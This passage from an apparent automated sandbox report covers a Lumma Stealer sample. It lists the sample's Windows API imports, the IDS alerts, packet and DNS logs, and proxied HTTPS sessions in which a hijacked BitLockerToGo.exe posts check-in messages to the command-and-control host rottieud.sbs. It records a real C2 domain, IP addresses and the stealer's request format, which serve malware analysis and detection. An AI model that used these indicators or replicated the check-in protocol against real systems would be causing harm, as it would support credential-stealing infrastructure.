WriteFile, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetThreadPriority, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, PostQueuedCompletionStatus, LoadLibraryA, LoadLibraryW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateWaitableTimerA, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-10T09:27:19.114331+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.109.210.53	443	192.168.2.4	49730	TCP
2024-11-10T09:27:20.119008+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49734	104.21.73.211	443	TCP
2024-11-10T09:27:20.798754+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49734	104.21.73.211	443	TCP
2024-11-10T09:27:20.798754+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49734	104.21.73.211	443	TCP
2024-11-10T09:27:21.493404+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49736	104.21.73.211	443	TCP
2024-11-10T09:27:21.995787+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49736	104.21.73.211	443	TCP
2024-11-10T09:27:21.995787+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49736	104.21.73.211	443	TCP
2024-11-10T09:27:22.855660+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	62520	104.21.73.211	443	TCP
2024-11-10T09:27:24.216426+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	62521	104.21.73.211	443	TCP
2024-11-10T09:27:25.592113+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	62522	104.21.73.211	443	TCP
2024-11-10T09:27:27.143991+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	62523	104.21.73.211	443	TCP
2024-11-10T09:27:27.877172+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	62523	104.21.73.211	443	TCP
2024-11-10T09:27:28.980255+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	62524	104.21.73.211	443	TCP
2024-11-10T09:27:31.429815+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	62525	104.21.73.211	443	TCP
2024-11-10T09:27:59.304154+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.109.210.53	443	192.168.2.4	62527	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 10, 2024 09:27:19.506735086 CET	49734	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:19.506767035 CET	443	49734	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:19.506841898 CET	49734	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:19.509721994 CET	49734	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:19.509736061 CET	443	49734	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:20.118889093 CET	443	49734	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:20.119008064 CET	49734	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:20.164541960 CET	49734	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:20.164560080 CET	443	49734	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:20.164927006 CET	443	49734	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:20.211431980 CET	49734	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:20.326740980 CET	49734	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:20.326961994 CET	49734	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:20.327013969 CET	443	49734	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:20.798811913 CET	443	49734	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:20.798965931 CET	443	49734	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:20.799010992 CET	49734	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:20.800718069 CET	49734	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:20.800743103 CET	443	49734	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:20.800890923 CET	49734	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:20.800895929 CET	443	49734	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:20.882249117 CET	49736	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:20.882297993 CET	443	49736	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:20.882651091 CET	49736	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:20.885618925 CET	49736	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:20.885636091 CET	443	49736	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:21.493308067 CET	443	49736	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:21.493403912 CET	49736	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:21.494692087 CET	49736	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:21.494704008 CET	443	49736	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:21.494946957 CET	443	49736	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:21.496248007 CET	49736	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:21.496248007 CET	49736	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:21.496356010 CET	443	49736	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:21.995628119 CET	443	49736	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:21.995687962 CET	443	49736	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:21.995886087 CET	443	49736	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:21.995892048 CET	49736	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:21.995902061 CET	443	49736	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:21.995922089 CET	443	49736	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:21.995951891 CET	443	49736	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:21.995958090 CET	49736	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:21.995970011 CET	443	49736	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:21.996078014 CET	443	49736	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:21.996085882 CET	49736	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:21.996090889 CET	443	49736	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:21.996129036 CET	49736	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:21.996134043 CET	443	49736	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:21.996179104 CET	49736	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:22.112626076 CET	443	49736	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:22.112731934 CET	443	49736	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:22.112762928 CET	443	49736	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:22.112802982 CET	443	49736	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:22.112828970 CET	443	49736	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:22.112857103 CET	49736	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:22.112873077 CET	443	49736	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:22.112925053 CET	49736	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:22.112932920 CET	443	49736	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:22.112946033 CET	443	49736	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:22.113007069 CET	49736	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:22.113225937 CET	49736	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:22.113243103 CET	443	49736	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:22.113358021 CET	49736	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:22.113363981 CET	443	49736	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:22.226955891 CET	62520	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:22.227001905 CET	443	62520	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:22.227066994 CET	62520	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:22.227382898 CET	62520	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:22.227395058 CET	443	62520	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:22.855571032 CET	443	62520	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:22.855659962 CET	62520	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:22.871037960 CET	62520	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:22.871057987 CET	443	62520	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:22.871337891 CET	443	62520	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:22.895006895 CET	62520	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:22.895136118 CET	62520	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:22.895153999 CET	443	62520	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:22.895211935 CET	62520	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:22.895220041 CET	443	62520	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:23.515968084 CET	443	62520	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:23.516076088 CET	443	62520	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:23.516122103 CET	62520	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:23.516264915 CET	62520	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:23.516288042 CET	443	62520	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:23.609741926 CET	62521	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:23.609802961 CET	443	62521	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:23.609901905 CET	62521	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:23.610233068 CET	62521	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:23.610244989 CET	443	62521	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:24.216295958 CET	443	62521	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:24.216425896 CET	62521	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:24.217765093 CET	62521	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:24.217775106 CET	443	62521	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:24.218003035 CET	443	62521	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:24.225662947 CET	62521	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:24.225796938 CET	62521	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:24.225828886 CET	443	62521	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:24.740210056 CET	443	62521	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:24.740314007 CET	443	62521	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:24.740497112 CET	62521	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:24.740808010 CET	62521	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:24.740824938 CET	443	62521	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:24.961523056 CET	62522	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:24.961561918 CET	443	62522	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:24.961749077 CET	62522	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:24.961961031 CET	62522	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:24.961977005 CET	443	62522	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:25.591945887 CET	443	62522	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:25.592113018 CET	62522	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:25.593322992 CET	62522	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:25.593343973 CET	443	62522	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:25.593588114 CET	443	62522	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:25.594820976 CET	62522	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:25.594974041 CET	62522	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:25.595014095 CET	443	62522	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:25.595063925 CET	62522	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:25.595077991 CET	443	62522	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:26.156002045 CET	443	62522	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:26.156111956 CET	443	62522	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:26.156311035 CET	62522	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:26.156806946 CET	62522	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:26.156825066 CET	443	62522	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:26.544266939 CET	62523	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:26.544322014 CET	443	62523	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:26.544414043 CET	62523	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:26.544744968 CET	62523	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:26.544761896 CET	443	62523	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:27.143836021 CET	443	62523	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:27.143990993 CET	62523	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:27.145203114 CET	62523	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:27.145217896 CET	443	62523	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:27.145452976 CET	443	62523	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:27.149569988 CET	62523	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:27.149647951 CET	62523	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:27.149652958 CET	443	62523	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:27.877187014 CET	443	62523	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:27.877279043 CET	443	62523	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:27.877477884 CET	62523	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:27.877631903 CET	62523	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:28.372750044 CET	62524	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:28.372793913 CET	443	62524	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:28.372884035 CET	62524	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:28.373186111 CET	62524	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:28.373198032 CET	443	62524	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:28.980118990 CET	443	62524	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:28.980254889 CET	62524	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:28.981656075 CET	62524	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:28.981664896 CET	443	62524	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:28.981903076 CET	443	62524	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:28.983134985 CET	62524	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:28.983913898 CET	62524	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:28.983948946 CET	443	62524	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:28.984046936 CET	62524	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:28.984086037 CET	443	62524	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:28.984194040 CET	62524	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:28.984215021 CET	443	62524	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:28.984344006 CET	62524	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:28.984371901 CET	443	62524	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:28.984518051 CET	62524	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:28.984545946 CET	443	62524	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:28.984693050 CET	62524	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:28.984726906 CET	443	62524	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:28.984740019 CET	62524	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:28.984890938 CET	62524	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:28.984925985 CET	62524	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:28.994240046 CET	443	62524	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:28.994393110 CET	62524	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:28.994417906 CET	443	62524	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:28.994440079 CET	62524	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:28.994457006 CET	62524	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:28.994457006 CET	443	62524	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:28.994481087 CET	443	62524	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:28.994573116 CET	62524	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:28.994606018 CET	62524	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:28.994640112 CET	62524	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:28.999098063 CET	443	62524	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:28.999174118 CET	62524	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:28.999186039 CET	443	62524	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:30.774921894 CET	443	62524	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:30.775038958 CET	443	62524	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:30.775096893 CET	62524	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:30.775295973 CET	62524	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:30.775307894 CET	443	62524	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:30.808507919 CET	62525	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:30.808558941 CET	443	62525	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:30.808618069 CET	62525	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:30.808912039 CET	62525	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:30.808928013 CET	443	62525	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:31.429744005 CET	443	62525	104.21.73.211	192.168.2.4
Nov 10, 2024 09:27:31.429815054 CET	62525	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:31.429836988 CET	62525	443	192.168.2.4	104.21.73.211
Nov 10, 2024 09:27:31.430027008 CET	62525	443	192.168.2.4	104.21.73.211

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 10, 2024 09:27:19.458338976 CET	57905	53	192.168.2.4	1.1.1.1
Nov 10, 2024 09:27:19.499681950 CET	53	57905	1.1.1.1	192.168.2.4
Nov 10, 2024 09:27:21.343269110 CET	53	63229	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 10, 2024 09:27:19.458338976 CET	192.168.2.4	1.1.1.1	0x9b36	Standard query (0)	rottieud.sbs	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 10, 2024 09:27:19.499681950 CET	1.1.1.1	192.168.2.4	0x9b36	No error (0)	rottieud.sbs		104.21.73.211	A (IP address)	IN (0x0001)	false
Nov 10, 2024 09:27:19.499681950 CET	1.1.1.1	192.168.2.4	0x9b36	No error (0)	rottieud.sbs		172.67.192.43	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

rottieud.sbs

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	104.21.73.211	443	7812	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 08:27:20 UTC	259	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: rottieud.sbs
2024-11-10 08:27:20 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-11-10 08:27:20 UTC	1009	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 08:27:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gimaj8dqliuujn9jfp5g9hsenb; expires=Thu, 06-Mar-2025 02:13:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8%2BLNzHCQ5hdrOP0eMdoIrvkAtJ8ziIT7IUp33COyVhX9dEoV6U6rx%2BgKIULMNiF6V8FX9K9WUZt7mAAZWKoFs%2F5SnZTEOFdZhtzRC9LhHDa56LBtlQm1Z%2Fq9CSD1%2F6w%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e04a9ac6ecd46cb-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1240&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=903&delivery_rate=2364081&cwnd=251&unsent_bytes=0&cid=e9804a55e9c07247&ts=690&x=0"
2024-11-10 08:27:20 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-11-10 08:27:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49736	104.21.73.211	443	7812	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 08:27:21 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 47 Host: rottieud.sbs
2024-11-10 08:27:21 UTC	47	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 65 53 61 78 41 75 2d 2d 77 65 62 65 78 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=eSaxAu--webex&j=
2024-11-10 08:27:21 UTC	1003	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 08:27:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=p6or4dmoslus27hdvvrtluv8qa; expires=Thu, 06-Mar-2025 02:14:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xZgLHeak249TMRnDWIX8jqKyCRkaExLnZs0teVWlrYVMCRdPB1BzLvH53LvDlDTKCik8VOIu0WsiMI%2BDlvWiTeMq7IxRWD9uJ5q0%2BzBBz7dguwPMVtYpqMJ78nx2fTk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e04a9b3be4a2e75-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1577&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=943&delivery_rate=1714624&cwnd=245&unsent_bytes=0&cid=15d2c180689f6a9c&ts=509&x=0"
2024-11-10 08:27:21 UTC	366	IN	Data Raw: 31 64 37 36 0d 0a 44 4e 66 77 73 72 39 44 71 75 55 58 62 66 76 47 6f 49 61 45 2f 57 7a 2f 31 39 45 67 64 50 61 6b 71 6d 44 43 5a 44 6c 35 37 55 78 33 39 59 61 51 68 58 65 47 78 32 51 49 32 66 7a 55 39 50 47 59 51 4e 32 32 74 51 4a 4f 6b 4d 58 47 45 36 64 49 47 77 2b 41 62 6a 61 78 6b 64 37 4d 4a 6f 62 48 63 68 58 5a 2f 50 76 39 70 70 67 43 33 65 33 7a 52 52 36 55 78 63 59 43 6f 77 39 57 43 59 45 76 5a 4c 75 58 32 74 6f 67 7a 6f 52 37 41 4a 36 6a 78 65 66 75 6b 77 57 53 76 37 77 43 57 4e 54 42 30 45 4c 34 52 6e 51 63 6d 53 31 42 74 6f 50 5a 6e 54 36 47 6e 6a 55 49 6c 65 53 61 70 4f 57 59 44 70 4f 78 74 55 73 63 6e 73 7a 4f 41 36 59 4f 53 52 43 4c 4a 47 53 31 6c 4e 76 51 4b 64 71 4a 63 51 65 56 70 63 2f 6e 70 74 46 4f 6d 71 33 7a 47 6c 62 48 39 4d 73 54 73 Data Ascii: 1d76DNfwsr9DquUXbfvGoIaE/Wz/19EgdPakqmDCZDl57Ux39YaQhXeGx2QI2fzU9PGYQN22tQJOkMXGE6dIGw+Abjaxkd7MJobHchXZ/Pv9ppgC3e3zRR6UxcYCow9WCYEvZLuX2togzoR7AJ6jxefukwWSv7wCWNTB0EL4RnQcmS1BtoPZnT6GnjUIleSapOWYDpOxtUscnszOA6YOSRCLJGS1lNvQKdqJcQeVpc/nptFOmq3zGlbH9MsTs
2024-11-10 08:27:21 UTC	1369	IN	Data Raw: 37 35 49 44 6e 62 69 35 54 52 57 55 77 63 49 49 72 77 78 66 46 6f 49 6f 62 72 58 53 6e 70 30 6d 30 4d 63 74 54 37 71 68 30 75 50 71 69 55 79 6e 39 61 77 4d 44 39 54 42 78 45 4c 34 52 6c 4d 65 6a 43 31 6c 75 70 48 59 31 6a 50 49 6c 58 4d 43 6e 4c 62 45 34 65 69 56 44 59 2b 2f 76 55 51 56 6e 63 33 42 42 36 63 43 47 31 58 50 4b 58 62 31 79 70 44 38 4c 4d 4f 4c 66 78 69 5a 35 4e 32 71 2f 39 38 4a 6b 66 58 72 41 68 4b 56 77 73 6b 47 72 67 68 66 46 34 6b 67 59 37 71 55 32 74 30 6d 77 6f 39 39 44 70 53 76 7a 65 54 6a 6b 67 71 62 75 62 4a 48 56 74 71 47 7a 78 72 67 58 68 73 31 69 43 31 38 39 36 66 54 30 79 2f 50 6b 54 55 51 31 37 32 43 34 2b 72 66 56 74 32 37 74 6b 30 45 6c 64 54 4e 44 4c 49 4b 58 68 32 43 4c 57 43 31 6c 39 66 51 4c 38 36 41 64 67 65 64 70 63 7a Data Ascii: 75IDnbi5TRWUwcIIrwxfFoIobrXSnp0m0MctT7qh0uPqiUyn9awMD9TBxEL4RlMejC1lupHY1jPIlXMCnLbE4eiVDY+/vUQVnc3BB6cCG1XPKXb1ypD8LMOLfxiZ5N2q/98JkfXrAhKVwskGrghfF4kgY7qU2t0mwo99DpSvzeTjkgqbubJHVtqGzxrgXhs1iC1896fT0y/PkTUQ172C4+rfVt27tk0EldTNDLIKXh2CLWC1l9fQL86Adgedpcz
